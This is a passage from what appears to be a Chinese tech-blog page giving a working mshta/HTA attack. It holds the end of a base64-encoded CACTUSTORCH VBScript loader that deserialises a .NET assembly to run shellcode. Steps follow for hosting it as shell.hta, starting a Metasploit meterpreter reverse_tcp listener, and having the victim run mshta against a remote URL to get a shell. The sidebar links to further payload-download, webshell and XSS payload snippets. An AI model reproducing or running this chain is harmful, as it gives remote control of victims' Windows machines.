s = s & "BAAAAEAEAAAAgAQAMAAABAAAQAACBggCBgICBgkDBhEUAwYRGAIGBgMGESADBhEkEwAKGA4OEgwS"

s = s & "DAIRFBgOEhwQERAKAAUYGBgYESARJAkABQIYGB0FGAgFAAICGAkKAAcYGBgJGBgJGAUgAgEODggB"

s = s & "AAgAAAAAAB4BAAEAVAIWV3JhcE5vbkV4Y2VwdGlvblRocm93cwEIAQACAAAAAAAQAQALQ0FDVFVT"

s = s & "VE9SQ0gAAAUBAAAAAAUBAAEAACkBACQ1NjU5OGYxYy02ZDg4LTQ5OTQtYTM5Mi1hZjMzN2FiZTU3"

s = s & "NzcAAAwBAAcxLjAuMC4wAAAASDUAAAAAAAAAAAAAYjUAAAAgAAAAAAAAAAAAAAAAAAAAAAAAAAAA"

s = s & "AFQ1AAAAAAAAAAAAAAAAX0NvckRsbE1haW4AbXNjb3JlZS5kbGwAAAAAAP8lACAAEAAAAAAAAAAA"

s = s & "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"

s = s & "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"

s = s & "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAEAEAAAABgAAIAAAAAAAAAAAAAAAAAAAAEAAQAA"

s = s & "ADAAAIAAAAAAAAAAAAAAAAAAAAEAAAAAAEgAAABYQAAANAMAAAAAAAAAAAAANAM0AAAAVgBTAF8A"

s = s & "VgBFAFIAUwBJAE8ATgBfAEkATgBGAE8AAAAAAL0E7/4AAAEAAAABAAAAAAAAAAEAAAAAAD8AAAAA"

s = s & "AAAABAAAAAIAAAAAAAAAAAAAAAAAAABEAAAAAQBWAGEAcgBGAGkAbABlAEkAbgBmAG8AAAAAACQA"

s = s & "BAAAAFQAcgBhAG4AcwBsAGEAdABpAG8AbgAAAAAAAACwBJQCAAABAFMAdAByAGkAbgBnAEYAaQBs"

s = s & "AGUASQBuAGYAbwAAAHACAAABADAAMAAwADAAMAA0AGIAMAAAADAADAABAEMAbwBtAG0AZQBuAHQA"

s = s & "cwAAAEMAQQBDAFQAVQBTAFQATwBSAEMASAAAACIAAQABAEMAbwBtAHAAYQBuAHkATgBhAG0AZQAA"

s = s & "AAAAAAAAAEAADAABAEYAaQBsAGUARABlAHMAYwByAGkAcAB0AGkAbwBuAAAAAABDAEEAQwBUAFUA"

s = s & "UwBUAE8AUgBDAEgAAAAwAAgAAQBGAGkAbABlAFYAZQByAHMAaQBvAG4AAAAAADEALgAwAC4AMAAu"

s = s & "ADAAAABAABAAAQBJAG4AdABlAHIAbgBhAGwATgBhAG0AZQAAAEMAQQBDAFQAVQBTAFQATwBSAEMA"

s = s & "SAAuAGQAbABsAAAAPAAMAAEATABlAGcAYQBsAEMAbwBwAHkAcgBpAGcAaAB0AAAAQwBBAEMAVABV"

s = s & "AFMAVABPAFIAQwBIAAAAKgABAAEATABlAGcAYQBsAFQAcgBhAGQAZQBtAGEAcgBrAHMAAAAAAAAA"

s = s & "AABIABAAAQBPAHIAaQBnAGkAbgBhAGwARgBpAGwAZQBuAGEAbQBlAAAAQwBBAEMAVABVAFMAVABP"

s = s & "AFIAQwBIAC4AZABsAGwAAAA4AAwAAQBQAHIAbwBkAHUAYwB0AE4AYQBtAGUAAAAAAEMAQQBDAFQA"

s = s & "VQBTAFQATwBSAEMASAAAADQACAABAFAAcgBvAGQAdQBjAHQAVgBlAHIAcwBpAG8AbgAAADEALgAw"

s = s & "AC4AMAAuADAAAAA4AAgAAQBBAHMAcwBlAG0AYgBsAHkAIABWAGUAcgBzAGkAbwBuAAAAMQAuADAA"

s = s & "LgAwAC4AMAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"

s = s & "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"

s = s & "AAAAAAAAAAAAAAAAADAAAAwAAAB0NQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"

s = s & "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"

s = s & "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"

s = s & "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"

s = s & "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"

s = s & "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"

s = s & "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"

s = s & "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"

s = s & "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"

s = s & "AAAAAAAAAAAAAAABDQAAAAQAAAAJFwAAAAkGAAAACRYAAAAGGgAAACdTeXN0ZW0uUmVmbGVjdGlv"

s = s & "bi5Bc3NlbWJseSBMb2FkKEJ5dGVbXSkIAAAACgsA"

entry_class = "cactusTorch"

Dim fmt, al, d, o

Set fmt = CreateObject("System.Runtime.Serialization.Formatters.Binary.BinaryFormatter")

Set al = CreateObject("System.Collections.ArrayList")

al.Add fmt.SurrogateSelector

Set d = fmt.Deserialize_2(Base64ToStream(s))

Set o = d.DynamicInvoke(al.ToArray()).CreateInstance(entry_class)

o.flame binary,code

End Sub

SetVersion

On Error Resume Next

Run

If Err.Number <> 0 Then

Debug Err.Description

Err.Clear

End If

self.close

将上方替换好的代码,重命名为 shell.hta 文件,然后放到apache根目录下,启动远程服务。

4.然后攻击主机运行以下代码,开启一个侦听器。

msf5 > use exploit/multi/handler

msf5 exploit(multi/handler) > set payload windows/meterpreter/reverse_tcp

payload => windows/meterpreter/reverse_tcp

msf5 exploit(multi/handler) >

msf5 exploit(multi/handler) > set lhost 192.168.1.30

lhost => 192.168.1.7

msf5 exploit(multi/handler) > set lport 8888

lport => 8888

msf5 exploit(multi/handler) > exploit -j -z

5.被攻击主机执行,以下命令,完成上线。

mshta.exe http://lyshark.com/shell.hta

weixin_39761573
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
HTML——电脑病毒 特效(效果+代码)】
追光者♂:记录、分享、总结、提升,现象级专栏《Python从入门到人工智能》作者,无惧黑暗,坚信曙光
02-08 3387
目录效果代码说明 效果 代码 index.html <!DOCTYPE html> <html> <head> <meta charset="UTF-8"> <title>电脑病毒——特效</title> <style> body { background-color: #008000; margin: 0px; cur
src和href的区别,并且img中的srcset的作用是什么?
weixin_47450807的博客
04-16 1626
一、src和href的区别 src是指向外部资源的位置,指向的内容会嵌⼊到⽂档中当前标签所在的位置,在请求src资源时会将其指向的资源下载并应⽤到⽂档内,如js脚本,img图⽚和frame等元素。当浏览器解析到该元素时,会暂停其他资源的下载和处理,知道将该资源加载、编译、执⾏完毕,所以⼀般js脚本会放在底部⽽不是头部。 href是指网络资源所在位置(的超链接),⽤来建⽴和当前元素或⽂档之间的连接,当浏览器识别到它他指向的⽂件时,就会并⾏下载资源,不会停⽌对当前⽂档的处理。比如link标签。 二、知道img的
js一句话下载payload(第四十三课).pdf
05-09
js一句话下载payload(第四十三课).pdf
一句话下载payload(持续更新)
god_Zeo的安全博客
04-24 1505
js一句话下载payload windows 全版本都会默认支持 js,并且通过cscript 来调用达到下载 payload 的目的。 var WinHttpReq = new ActiveXObject("WinHttp.WinHttpRequest.5.1"); WinHttpReq.Open("GET", WScript.Arguments(0), /*async=*/false); Wi...
js-xss:使用白名单指定的配置对不受信任HTML进行清理(以防止XSS)
02-27
使用白名单指定的配置对不受信任HTML进行清理(以防止XSS)。 xss是用于过滤用户输入以防止XSS攻击的模块。 ( ) 项目主页: : 在线尝试: : 特征 指定HTML标记及其白名单允许的属性 使用自定义功能处理所有标签或属性。 参考 基准(仅供参考) xss模块:22.53 MB / s 来自模块validator@0.3.7 xss()函数:6.9 MB / s 有关测试代码,请参考benchmark目录。 他们正在使用xss模块 nodeclub-使用MongoDB的Node.js bbs- cnpmjs.org-企业专用npm注册表和网站-https : 安装 NPM npm install xss 凉亭 bower install xss 或者 bower install https://github.com/leizongmin/js-xss.gi
根据白名单过滤 HTML(防止 XSS 攻击)
xu990128638的专栏
02-08 428
D:\open_source\t1eexx>npm install xss --registry=registry.npm.taobao.org -S npm WARN invalid config registry="registry.npm.taobao.org" npm WARN invalid config Must be a full url with 'http://' npm WARN safety-code@1.0.0 No description npm WARN safe...
JS使用htef访问html文件,法语TEF考试语法及词汇练习.docx
weixin_30016961的博客
07-03 189
TEE 阴汇讦计去井类茂腹体InflHltlfNous sornmes tres contents dr avec vqus.a . avoirb. etrec< amuserd. hebllterEn cas d'urgence., vous pouvez me sur montelephone portahl-eb曰"ccmmunlqcierb. Joi nd rec. sonnerd+...
C#中Imagelist详解
li3781695的博客
01-14 3万+
借由编译器自动生成的代码和动态创建的代码来说一说Imagelist控件的使用: 首先拖入一个imagelist控件,其将在窗口下面分栏显示: 接着插入一些图片: 编译后,我们会发现资源管理器中出现了一个后缀为resx的文件: 度娘一下得到了如下解释:托管资源, 非代码类的, 图片, 图标, 文件等等, 可以编译进最终的程序集中, 运行时可以用 ResourceManager 来加载使用,...
前端——使用jQuery给a标签添加、修改href链接
前方一片光明
11-12 3万+
HTML代码: <aid="qiaofeng">乔峰</a> jQuery代码: $('#qiaofeng').attr('href','http://tianlongbabu.com'); 添加和修改都是上面的代码; OK, GAME OVER
a标签的href属性的使用js函数
xclsky的博客
12-15 6747
1 a标签具有href属性和onclick事件。 如:登陆 2 href属性为连接地址。可以理解为url。跳转的路径。如果想要在href上执行js的函数。需要添加“javascript:” 如:登陆 function testHref(){   alert("这是a标签的href函数");   } 3 一般习惯而言。是href只执行javascript:voi
window.location.href和window.open的几种用法和区别
weixin_33963594的博客
04-01 2350
使用js的同学一定知道js的location.href的作用是什么,但是在js中关于location.href的用法究竟有哪几种,究竟有哪些区别,估计很多人都不知道了。 一、location.href常见的几种形式 目前在开发中经常要用到的几种形式有: 1 2 3 4 5 6 self.location.href;//当前页面打开URL页面 ...
a标签中href=""的几种用法
博客
03-02 1万+
众所周知,a标签的最重要功能是实现超链接和锚点。而且,大多数人认为a标签最重要的作用是实现超链接,今天我刚好碰到a标签的一种写法,所以就来整理下a标签中href的几种用法。 一、Js的几种调用方法(参考总结的)1、a href=”javascript:js_method();” 这是常用的方法,但是这种方法在传递this等参数的时候很容易出问题,而且javascript:协议作为a的href
html过去当前页面的htef,在EF Code First迁移中使用自定义逻辑
weixin_42393452的博客
06-03 93
我有一个具有一定数据量(即DB不为空)的现有数据库。现在我决定加密一些敏感数据。我有一列TemplateBlocks : string。我将用新的列TemplateBlocksEnc : byte[]替换它,并且确实更改了我的Code First模型。然后,我产生了迁移并卡住了!在EF Code First迁移中使用自定义逻辑public partial class EncryptTemplate...
基于白名单Payload
weixin_30790841的博客
08-14 3087
利用 Msiexec 命令DLL反弹 Msiexec是Windows Installer的一部分。用于安装Windows Installer安装包(MSI),一般在运行Microsoft Update安装更新或安装部分软件的时候出现,占用内存比较大。并且集成于Windows 7,Windows 10等,在Windows 10系统中无需配置环境变量就能直接被调用,非常的方便。 1.首先生成...
WEB漏洞测试payload整理
nextdoor6的博客
12-14 9518
常用web漏洞测试的payload整理,把写的一个类sqlmap的web安全漏洞测试工具的Payload整理下来,供大家测试时参考。 [反射型xss] [在html形成] "'>document.title="[random]"; document.title="[random]"; [在js形成] document.title="[random]";// ;document.titl
js下载文件的几种方式
qq_41538952的博客
08-30 2946
一、此方法火狐有些版本是不支持的 window.location.href = 'https://*****.oss-cn-**.aliyuncs.com/*********'; 二、为了解决火狐有些版本不支持,可以改成这种方式 window.location='https://*****.oss-cn-**.aliyuncs.com/*********'; 三、该方法IE和火狐都可以,url表示要下载的文件路径: function(url){ try { var elemIF.
一句话解释shellcode、payload、exploit
qq_34304107的博客
02-25 1508
shellcode是一系列指令 payload是实现如何连接shell,或者控制靶机做什么操作的一段shellcode exploit是一段携带payload的,对特定漏洞的利用代码 用一句话概括变为:exploit包含payloadpayload由shellcode组成。...
hxyx4xyzindex php vo,webshell/php/oi.php.txt at da33d92ba83c1f8d44e15957022ed4a03423a699 · tennc/web...
热门推荐
weixin_31163455的博客
03-26 32万+
eval("?>".gzuncompress(base64_decode("eJzsvXtbG0eyOPz/eZ7zHZqJYkuxEALbuYAhwYBjToxhAa83P+BVRpqRNEHSKDMjLsn6u79V1feeHkmQZE/2POvd2Jq+VFdXd1dXV1dVv/p2Opz+9399ttwfLMjif7DDyU0YJVHKNtrtb1jpDxaM4n4yietP82H...
对亮神基于白名单Mshta.exe 执行 payload 第五季复现
cxk
05-03 2370
0x00 Mshta简介 Mshta.exe是微软Windows操作系统相关程序,英文全称Microsoft HTML Application,可翻译为微软超文本标记语言应用,用于执行.HTA文件 0x01 环境 攻击机kali 192.168.5.99 靶机win7 192.168.5.112 装有国内常见AV 0x02复现 攻击机配置监听 靶机运行 shell弹回 0x03 test.h...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值